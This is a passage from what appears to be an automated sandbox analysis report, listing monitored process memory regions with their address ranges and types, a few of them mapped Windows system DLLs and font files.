filename = ""
Region:
id = 733
start_va = 0x76b0000
end_va = 0x76bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076b0000"
filename = ""
Region:
id = 734
start_va = 0x76c0000
end_va = 0x76cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076c0000"
filename = ""
Region:
id = 735
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 736
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 737
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 738
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 739
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 740
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 741
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 742
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 743
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 744
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 745
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 746
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 747
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 748
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 749
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 750
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 751
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 752
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 753
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 754
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 755
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 756
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 757
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 758
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 759
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 760
start_va = 0x7690000
end_va = 0x769ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007690000"
filename = ""
Region:
id = 761
start_va = 0x76b0000
end_va = 0x76bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076b0000"
filename = ""
Region:
id = 762
start_va = 0x76c0000
end_va = 0x76cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076c0000"
filename = ""
Region:
id = 763
start_va = 0x76c0000
end_va = 0x76cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076c0000"
filename = ""
Region:
id = 764
start_va = 0x76c0000
end_va = 0x76cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076c0000"
filename = ""
Region:
id = 765
start_va = 0x76c0000
end_va = 0x76cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076c0000"
filename = ""
Region:
id = 766
start_va = 0x76d0000
end_va = 0x76dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076d0000"
filename = ""
Region:
id = 767
start_va = 0x76e0000
end_va = 0x76effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076e0000"
filename = ""
Region:
id = 768
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 769
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 770
start_va = 0x7690000
end_va = 0x769ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007690000"
filename = ""
Region:
id = 771
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 772
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 773
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 774
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 775
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 776
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 777
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 778
start_va = 0x7690000
end_va = 0x769ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007690000"
filename = ""
Region:
id = 779
start_va = 0x76b0000
end_va = 0x76bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076b0000"
filename = ""
Region:
id = 780
start_va = 0x76c0000
end_va = 0x76cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076c0000"
filename = ""
Region:
id = 781
start_va = 0x76d0000
end_va = 0x76dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076d0000"
filename = ""
Region:
id = 782
start_va = 0x76e0000
end_va = 0x76effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076e0000"
filename = ""
Region:
id = 783
start_va = 0x76f0000
end_va = 0x76fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076f0000"
filename = ""
Region:
id = 784
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 785
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 786
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 787
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 788
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 789
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 790
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 791
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 792
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 793
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 794
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 795
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 796
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 797
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 798
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 799
start_va = 0x7690000
end_va = 0x769ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007690000"
filename = ""
Region:
id = 800
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 801
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 802
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 803
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 804
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 805
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 806
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 807
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 808
start_va = 0x76b0000
end_va = 0x76bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076b0000"
filename = ""
Region:
id = 809
start_va = 0x76c0000
end_va = 0x76cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076c0000"
filename = ""
Region:
id = 810
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 811
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 812
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 813
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 814
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 815
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 816
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 817
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 818
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 819
start_va = 0x76b0000
end_va = 0x76bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076b0000"
filename = ""
Region:
id = 820
start_va = 0x76b0000
end_va = 0x76effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076b0000"
filename = ""
Region:
id = 821
start_va = 0x76f0000
end_va = 0x77effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076f0000"
filename = ""
Region:
id = 822
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 823
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 824
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 825
start_va = 0x77f0000
end_va = 0x77fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000077f0000"
filename = ""
Region:
id = 826
start_va = 0x7800000
end_va = 0x780ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007800000"
filename = ""
Region:
id = 827
start_va = 0x7810000
end_va = 0x781ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007810000"
filename = ""
Region:
id = 828
start_va = 0x7820000
end_va = 0x782ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007820000"
filename = ""
Region:
id = 829
start_va = 0x7830000
end_va = 0x783ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007830000"
filename = ""
Region:
id = 830
start_va = 0x7840000
end_va = 0x784ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007840000"
filename = ""
Region:
id = 831
start_va = 0x7850000
end_va = 0x785ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007850000"
filename = ""
Region:
id = 832
start_va = 0x7860000
end_va = 0x786ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007860000"
filename = ""
Region:
id = 833
start_va = 0x7870000
end_va = 0x787ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007870000"
filename = ""
Region:
id = 834
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 835
start_va = 0x7880000
end_va = 0x797ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007880000"
filename = ""
Region:
id = 836
start_va = 0x7450000
end_va = 0x7450fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 837
start_va = 0x7980000
end_va = 0x89bffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 838
start_va = 0x77f0000
end_va = 0x77fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000077f0000"
filename = ""
Region:
id = 839
start_va = 0x7810000
end_va = 0x781ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007810000"
filename = ""
Region:
id = 840
start_va = 0x7800000
end_va = 0x780ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007800000"
filename = ""
Region:
id = 841
start_va = 0x7820000
end_va = 0x782ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007820000"
filename = ""
Region:
id = 842
start_va = 0x89c0000
end_va = 0x8a2bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "seguisbi.ttf"
filename = "\\Windows\\Fonts\\seguisbi.ttf" (normalized: "c:\\windows\\fonts\\seguisbi.ttf")
Region:
id = 843
start_va = 0x7830000
end_va = 0x783ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007830000"
filename = ""
Region:
id = 844
start_va = 0x7830000
end_va = 0x783ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007830000"
filename = ""
Region:
id = 845
start_va = 0x8a30000
end_va = 0x8abefff
monitored = 0
entry_point = 0x8a3dd60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 846
start_va = 0x6a6a0000
end_va = 0x6a731fff
monitored = 0
entry_point = 0x6a6add60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 847
start_va = 0x8a30000
end_va = 0x8b8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008a30000"
filename = ""
Region:
id = 848
start_va = 0x7840000
end_va = 0x7840fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000007840000"
filename = ""
Region:
id = 849
start_va = 0x8a30000
end_va = 0x8aebfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008a30000"
filename = ""
Region:
id = 850
start_va = 0x8b80000
end_va = 0x8b8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b80000"
filename = ""
Region:
id = 851
start_va = 0x7840000
end_va = 0x7843fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000007840000"
filename = ""
Region:
id = 852
start_va = 0x7850000
end_va = 0x7853fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007850000"
filename = ""
Region:
id = 853
start_va = 0x8af0000
end_va = 0x8b7efff
monitored = 0
entry_point = 0x8afdd60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 854
start_va = 0x6a6a0000
end_va = 0x6a731fff
monitored = 0
entry_point = 0x6a6add60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 855
start_va = 0x8af0000
end_va = 0x8b3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008af0000"
filename = ""
Region:
id = 856
start_va = 0x8af0000
end_va = 0x8b7efff
monitored = 0
entry_point = 0x8afdd60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 857
start_va = 0x6a6a0000
end_va = 0x6a731fff
monitored = 0
entry_point = 0x6a6add60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 858
start_va = 0x8af0000
end_va = 0x8c0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008af0000"
filename = ""
Region:
id = 859
start_va = 0x8af0000
end_va = 0x8b7efff
monitored = 0
entry_point = 0x8afdd60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 860
start_va = 0x6a6a0000
end_va = 0x6a731fff
monitored = 0
entry_point = 0x6a6add60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 861
start_va = 0x8af0000
end_va = 0x8ceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008af0000"
filename = ""
Region:
id = 866
start_va = 0x7860000
end_va = 0x786dfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000007860000"
filename = ""
Region:
id = 867
start_va = 0x8af0000
end_va = 0x8afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008af0000"
filename = ""
Region:
id = 868
start_va = 0x8af0000
end_va = 0x8afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008af0000"
filename = ""
Region:
id = 869
start_va = 0x8b00000
end_va = 0x8b0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b00000"
filename = ""
Region:
id = 870
start_va = 0x8b10000
end_va = 0x8b1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b10000"
filename = ""
Region:
id = 871
start_va = 0x8b20000
end_va = 0x8b2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b20000"
filename = ""
Region:
id = 872
start_va = 0x8b30000
end_va = 0x8b3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b30000"
filename = ""
Region:
id = 873
start_va = 0x8b40000
end_va = 0x8b4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b40000"
filename = ""
Region:
id = 874
start_va = 0x8b50000
end_va = 0x8b5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b50000"
filename = ""
Region:
id = 875
start_va = 0x8b60000
end_va = 0x8b6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b60000"
filename = ""
Region:
id = 876
start_va = 0x8b70000
end_va = 0x8b7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b70000"
filename = ""
Region:
id = 877
start_va = 0x8b80000
end_va = 0x8b8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b80000"
filename = ""
Region:
id = 878
start_va = 0x8b90000
end_va = 0x8b9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b90000"
filename = ""
Region:
id = 879
start_va = 0x8ba0000
end_va = 0x8baffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008ba0000"
filename = ""
Region:
id = 880
start_va = 0x8bb0000
end_va = 0x8bbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008bb0000"
filename = ""
Region:
id = 881
start_va = 0x8af0000
end_va = 0x8afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008af0000"
filename = ""
Region:
id = 882
start_va = 0x6a730000
end_va = 0x6a737fff
monitored = 1
entry_point = 0x6a733809
region_type = mapped_file
name = "culture.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll")
Region:
id = 883
start_va = 0x8b00000
end_va = 0x8b00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008b00000"
filename = ""
Region:
id = 884
start_va = 0x8b00000
end_va = 0x8b53fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll")
Region:
id = 885
start_va = 0x6a5c0000
end_va = 0x6a732fff
monitored = 0
entry_point = 0x6a66d220
region_type = mapped_file
name = "windowscodecs.dll"
filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll")
Region:
id = 886
start_va = 0x8b80000
end_va = 0x8bfdfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b80000"
filename = ""
Region:
id = 887
start_va = 0x8c00000
end_va = 0x8c2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008c00000"
filename = ""
Region:
id = 888
start_va = 0x8c00000
end_va = 0x8c0ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008c00000"
filename = ""
Region:
id = 889
start_va = 0x8c10000
end_va = 0x8c1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008c10000"
filename = ""
Region:
id = 890
start_va = 0x8c20000
end_va = 0x8c2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008c20000"
filename = ""
Region:
id = 891
start_va = 0x8b60000
end_va = 0x8b6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b60000"
filename = ""
Region:
id = 892
start_va = 0x8c30000
end_va = 0x8cb5fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008c30000"
filename = ""
Region:
id = 893
start_va = 0x8cc0000
end_va = 0x8ccffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008cc0000"
filename = ""
Region:
id = 894
start_va = 0x8cd0000
end_va = 0x8cdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008cd0000"
filename = ""
Region:
id = 895
start_va = 0x8ce0000
end_va = 0x8ceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008ce0000"
filename = ""
Region:
id = 896
start_va = 0x8cf0000
end_va = 0x8cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008cf0000"
filename = ""
Region:
id = 897
start_va = 0x8ce0000
end_va = 0x8ceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008ce0000"
filename = ""
Region:
id = 898
start_va = 0x8cf0000
end_va = 0x8cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008cf0000"
filename = ""
Region:
id = 899
start_va = 0x8ce0000
end_va = 0x9cdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008ce0000"
filename = ""
Region:
id = 900
start_va = 0x9ce0000
end_va = 0x9efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009ce0000"
filename = ""
Region:
id = 901
start_va = 0x9f00000
end_va = 0xaefffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009f00000"
filename = ""
Region:
id = 902
start_va = 0xaf00000
end_va = 0xb32ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000af00000"
filename = ""
Region:
id = 903
start_va = 0xb330000
end_va = 0xb364fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000000b330000"
filename = ""
Region:
id = 904
start_va = 0xb370000
end_va = 0xb37ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b370000"
filename = ""
Region:
id = 905
start_va = 0xb380000
end_va = 0xb38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b380000"
filename = ""
Region:
id = 906
start_va = 0xb370000
end_va = 0xc36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b370000"
filename = ""
Region:
id = 907
start_va = 0xc370000
end_va = 0xd36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000c370000"
filename = ""
Region:
id = 908
start_va = 0xd370000
end_va = 0xe36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000d370000"
filename = ""
Region:
id = 909
start_va = 0xe370000
end_va = 0xe37ffff
monitored = 1
entry_point = 0x0
